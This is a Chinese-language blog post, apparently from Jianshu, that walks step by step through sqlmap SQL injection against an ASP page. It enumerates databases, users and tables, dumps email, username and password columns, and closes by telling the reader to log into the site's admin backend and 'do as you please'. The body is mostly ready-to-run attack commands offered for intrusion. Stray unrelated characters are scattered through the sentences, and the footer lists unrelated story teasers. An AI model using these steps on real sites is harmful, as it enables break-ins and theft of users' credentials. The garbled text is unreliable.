sqlmap注入基本步驟

一朽褪、檢測注入點(diǎn)是否可用

#sqlmap -u "http://192.168.1.150/products.asp?id=134"

參數(shù):

-u:指定注入點(diǎn)url

其中圖一有若干詢問語句另假,需要用戶輸入[Y/N]吁津,如果你懶得輸入或者不懂怎么輸入可以讓程序自動輸入,只需添加一個參數(shù)即可,命令如下:

#sqlmap -u "http://192.168.1.150/products.asp?id=134" --batch

二、暴庫

#sqlmap -u "http://192.168.1.150/products.asp?id=134" --dbs

參數(shù):

--dbs:dbs前面有兩條杠纲岭,請看清楚抹竹。

三、顯示web當(dāng)前使用的數(shù)據(jù)庫

#sqlmap -u "http://192.168.1.150/products.asp?id=134" --current-db

四荒勇、顯示web數(shù)據(jù)庫當(dāng)前賬戶

#sqlmap -u "http://192.168.1.150/products.asp?id=134" --current-user

五柒莉、列出sqlserver所有用戶

#sqlmap -u "http://192.168.1.150/products.asp?id=134" --users

六、顯示數(shù)據(jù)庫賬戶與密碼(一般是加密的)

#sqlmap -u "http://192.168.1.150/products.asp?id=134" --passwords

七沽翔、列出數(shù)據(jù)庫中的表

#sqlmap -u "http://192.168.1.150/products.asp?id=134" -D tourdata --tables

參數(shù):

-D:指定數(shù)據(jù)庫名稱

--tables:列出表

八兢孝、列出表中字段

#sqlmap -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb --columns

參數(shù):

-D:指定數(shù)據(jù)庫名稱

-T:指定要列出字段的表

--columns:指定列出字段

九、暴字段內(nèi)容

#sqlmap -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --dump

參數(shù):

-C :指定要暴的字段

--dump:將結(jié)果導(dǎo)出

如果字段內(nèi)容太多仅偎,需要花費(fèi)很多時間跨蟹。可以指定導(dǎo)出特定范圍的字段內(nèi)容橘沥,命令如下:

#sqlmap -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --start 1 --stop 10 --dump

參數(shù):

--start:指定開始的行

--stop:指定結(jié)束的行

此條命令的含義為:導(dǎo)出數(shù)據(jù)庫tourdata中的表userb中的字段(email,Username,userpassword)中的第1到第10行的數(shù)據(jù)內(nèi)容窗轩。

十、驗證結(jié)果

根據(jù)上述步驟爆出的賬號座咆,登錄網(wǎng)站后臺痢艺,然后就自由發(fā)揮了。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末介陶,一起剝皮案震驚了整個濱河市堤舒,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌哺呜,老刑警劉巖舌缤,帶你破解...
    沈念sama閱讀 211,884評論 6 492
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異某残,居然都是意外死亡国撵,警方通過查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,347評論 3 385
  • 文/潘曉璐 我一進(jìn)店門玻墅,熙熙樓的掌柜王于貴愁眉苦臉地迎上來介牙,“玉大人,你說我怎么就攤上這事澳厢〕苌” “怎么了?”我有些...
    開封第一講書人閱讀 157,435評論 0 348
  • 文/不壞的土叔 我叫張陵赏酥,是天一觀的道長。 經(jīng)常有香客問我谆构,道長裸扶,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 56,509評論 1 284
  • 正文 為了忘掉前任搬素,我火速辦了婚禮呵晨,結(jié)果婚禮上魏保,老公的妹妹穿的比我還像新娘。我一直安慰自己摸屠,他們只是感情好谓罗,可當(dāng)我...
    茶點(diǎn)故事閱讀 65,611評論 6 386
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著季二,像睡著了一般檩咱。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上胯舷,一...
    開封第一講書人閱讀 49,837評論 1 290
  • 那天刻蚯,我揣著相機(jī)與錄音,去河邊找鬼桑嘶。 笑死炊汹,一個胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的逃顶。 我是一名探鬼主播讨便,決...
    沈念sama閱讀 38,987評論 3 408
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼以政!你這毒婦竟也來了霸褒?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 37,730評論 0 267
  • 序言:老撾萬榮一對情侶失蹤妙蔗,失蹤者是張志新(化名)和其女友劉穎傲霸,沒想到半個月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體眉反,經(jīng)...
    沈念sama閱讀 44,194評論 1 303
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡昙啄,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 36,525評論 2 327
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了寸五。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片梳凛。...
    茶點(diǎn)故事閱讀 38,664評論 1 340
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖梳杏,靈堂內(nèi)的尸體忽然破棺而出韧拒,到底是詐尸還是另有隱情,我是刑警寧澤十性,帶...
    沈念sama閱讀 34,334評論 4 330
  • 正文 年R本政府宣布叛溢,位于F島的核電站,受9級特大地震影響劲适,放射性物質(zhì)發(fā)生泄漏楷掉。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,944評論 3 313
  • 文/蒙蒙 一霞势、第九天 我趴在偏房一處隱蔽的房頂上張望烹植。 院中可真熱鬧斑鸦,春花似錦、人聲如沸草雕。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,764評論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽墩虹。三九已至嘱巾,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間败晴,已是汗流浹背浓冒。 一陣腳步聲響...
    開封第一講書人閱讀 31,997評論 1 266
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留尖坤,地道東北人稳懒。 一個月前我還...
    沈念sama閱讀 46,389評論 2 360
  • 正文 我出身青樓,卻偏偏與公主長得像慢味,于是被迫代替她去往敵國和親场梆。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 43,554評論 2 349

推薦閱讀更多精彩內(nèi)容